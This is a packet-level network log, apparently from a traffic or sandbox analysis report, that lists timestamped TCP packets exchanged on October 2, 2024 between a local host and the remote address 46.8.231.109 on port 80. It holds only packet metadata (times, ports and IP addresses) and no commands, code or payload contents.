Oct 2, 2024 09:41:25.637463093 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.637494087 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.637526035 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.637538910 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.637538910 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.637538910 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.637538910 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.637557030 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.637588024 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.637619019 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.637649059 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.637680054 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.637684107 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.637684107 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.637712002 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.637742043 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.637773037 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.637804031 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.637835979 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.637866020 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.637896061 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.637907982 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.637907982 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.637907982 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.637907982 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.637926102 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.637957096 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.637988091 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.637996912 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.638019085 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.638048887 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.638082981 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.638113022 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.638144016 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.638174057 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.638205051 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.638223886 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.638223886 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.638223886 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.638223886 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.638236046 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.638264894 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.638293982 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.638324022 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.638354063 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.638385057 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.638415098 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.638447046 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.638458014 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.638458014 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.638458014 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.638458014 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.639410019 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.722897053 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.722939014 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.722994089 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.723026991 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.723045111 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.723045111 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.723045111 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.723077059 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.723130941 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.723165989 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.723201990 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.723201990 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.723201990 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.723216057 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.723265886 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.723295927 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.723325014 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.723356962 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.723356962 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.723375082 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.723411083 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.723411083 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.723453999 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.723550081 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.723607063 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.723639965 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.723670959 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.723678112 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.723723888 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.723756075 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.723776102 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.723776102 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.723808050 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.723839045 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.723870993 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.723885059 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.723885059 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.723885059 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.723918915 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.723952055 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.723984003 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.724009037 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.724009037 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.724009037 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.724034071 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.724066019 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.724097967 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.724112034 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.724112034 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.724112034 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.724128008 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.724159956 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.724189997 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.724237919 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.724240065 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.724240065 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.724240065 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.724240065 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.724270105 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.724304914 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.724335909 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.724387884 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.724417925 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.724423885 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.724423885 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.724452019 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.724483013 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.724514008 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.724538088 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.724538088 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.724538088 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.724538088 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.724545002 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.724576950 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.724606991 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.724637985 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.724649906 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.724649906 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.724649906 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.724649906 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.724668980 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.724699020 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.724730015 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.724761009 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.724792957 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.724802971 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.724802971 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.724803925 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.724803925 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.724826097 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.724859953 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.724890947 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.724921942 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.724952936 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.724967003 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.724967003 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.724967003 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.724967003 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.724983931 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.725014925 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.725045919 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.725078106 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.725107908 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.725131989 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.725131989 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.725131989 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.725131989 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.725138903 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.725169897 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.725200891 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.725220919 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.725220919 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.725233078 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.725233078 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.725264072 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.725296974 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.725328922 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.725358963 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.725389004 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.725413084 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.725413084 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.725413084 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.725413084 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.725419998 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.725455046 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.725744009 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.725744009 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.780237913 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.785105944 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.955779076 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.955851078 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.955885887 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.955919027 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.955971003 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.956002951 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.956034899 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.956065893 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.956096888 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.956114054 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.956114054 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.956114054 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.956114054 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.956127882 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.956161976 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.956193924 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.956244946 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.956295967 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.956331015 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.956342936 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.956342936 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.956342936 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.956342936 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.956362009 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.956393957 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.956443071 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.956480026 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.956486940 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.956486940 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.956486940 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.956486940 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.956509113 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.956540108 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.956573009 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.956604958 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.956636906 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.956650019 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.956650019 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.956650019 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.956650019 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.956669092 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.956702948 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.956734896 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.956768036 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.956779003 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.956779003 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.956779003 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.956779003 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.956800938 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.956832886 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.956865072 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.956897020 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.956928015 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.956942081 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.956942081 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.956942081 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.956942081 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.956959963 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.956991911 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.957025051 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.957056046 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.957068920 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.957068920 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.957068920 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.957068920 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.957106113 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.957375050 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.957406044 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.957456112 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.957499981 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.957499981 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.957499981 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.957499981 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.957501888 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.957535028 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.957582951 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.957614899 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.957642078 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.957690954 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.957722902 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.957753897 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.957767963 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.957767963 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.957767963 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.957767963 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.957787037 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.957818031 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.957849026 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.957894087 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.957894087 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.957894087 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.957894087 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.957899094 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.957931042 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.957978964 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.958010912 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.958056927 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.958056927 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.958056927 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.958056927 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.958060026 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.958108902 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.958142996 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.958190918 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.958221912 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.958252907 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.958252907 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.958252907 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.958252907 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.958254099 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.958303928 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.958352089 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.958383083 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.958429098 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.958429098 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.958429098 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.958429098 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.958431005 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.958462954 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.958509922 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.958540916 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.958589077 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.958620071 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.958664894 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.958664894 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.958664894 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.958664894 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.958668947 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.958700895 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.958749056 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.958756924 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.958756924 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.958801031 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.958837032 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.958864927 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.958895922 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.958928108 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.958959103 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.958975077 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.958975077 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.958975077 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.958975077 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.959007025 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.959033012 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.959038019 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.959069967 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.959070921 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.959100962 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.959100962 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.959145069 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.959157944 CEST	80	49749	46.8.231.109	192.168.2.4
